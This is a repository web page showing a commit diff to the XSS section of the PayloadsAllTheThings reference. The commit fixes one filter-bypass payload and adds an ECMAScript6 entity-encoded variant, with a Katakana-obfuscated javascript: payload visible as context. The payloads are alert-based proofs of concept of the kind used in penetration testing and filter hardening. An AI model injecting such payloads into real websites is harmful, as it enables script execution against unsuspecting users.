ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-01-31 07:27:25 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #46 from 0xInfection/patch-2

Browse Source 
Added a new bypass variant + fixed a payload
This commit is contained in:
Swissky 2019-02-20 08:14:27 +01:00 committed by GitHub
commit abb81aba7e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 7 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
XSS injection/README.md
View File

@ -465,7 +465,7 @@ You can bypass a single quote with ' in an on mousedown event handler
Bypass dot filter
```javascript
<script>window['alert'](document['domain'])<script>
<script>window['alert'](document['domain'])</script>
```
Bypass parenthesis for string - Firefox/Opera
@ -654,6 +654,12 @@ Bypass using [Katakana](https://github.com/aemkei/katakana.js)
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
```
Bypass using ECMAScript6 variation:
```
<script>alert&DiacriticalGrave;1&DiacriticalGrave;</script>
```
Bypass using Octal encoding
```javascript